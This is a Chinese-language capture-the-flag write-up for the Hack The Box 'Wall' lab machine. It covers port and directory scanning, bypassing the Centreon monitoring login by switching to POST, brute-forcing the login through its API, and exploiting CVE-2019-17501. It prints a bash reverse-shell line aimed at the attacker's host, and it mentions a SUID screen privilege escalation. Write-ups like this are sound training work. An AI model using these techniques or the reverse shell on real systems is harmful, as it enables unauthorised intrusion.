Hack the box_Wall

简介: Hack the box_Wall

 大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

信息枚举

masscan扫描开放端口

 640.png

nmap探测22,80端口的服务信息,发现被过滤了

640.png

利用gobuster扫描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157
->/.hta (Status: 403)
->/.htpasswd (Status: 403)
->/.htaccess (Status: 403)
->/index.html (Status: 200)
->/monitoring (Status: 401)
->/server-status (Status: 403)

只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改

 640.png

在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的

 640.png

我们使用Seclist字典进行爆破密码为 password1

 640.png

我们发现了系统版本为19.04.0

 640.png

低权限shell

该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下

->#!/bin/bash
->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

 640.png

再次写入bash命令获得反向连接shell

->bash /tmp/n00b.sh

并且获得TTY终端

 640.jpg

权限提升

在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:

/bin/screen-4.5.0

 640.png

使用poc获得root权限

 640.png

最后我们得到了user.txt、root.txt



相关文章
|
6月前
【qt】Tool Box组件
【qt】Tool Box组件
61 0
|
安全 Shell 测试技术
|
存储 NoSQL 安全
|
安全 Shell 测试技术
|
NoSQL JavaScript 前端开发
|
SQL Web App开发 安全
|
弹性计算 前端开发 JavaScript
webkit-box-orient:vertical 编译报错之autoprefixer问题
webkit-box-orient:vertical 编译报错之autoprefixer问题
254 0
webkit-box-orient:vertical 编译报错之autoprefixer问题
|
Web App开发 网络协议 Shell
Hack Knowledges
XSS(Cross-Site Scripting) Hacker PC -- upload XSS script to Web Server --> User PC Request for this Web Server --> Web Server response to the User PC...
849 0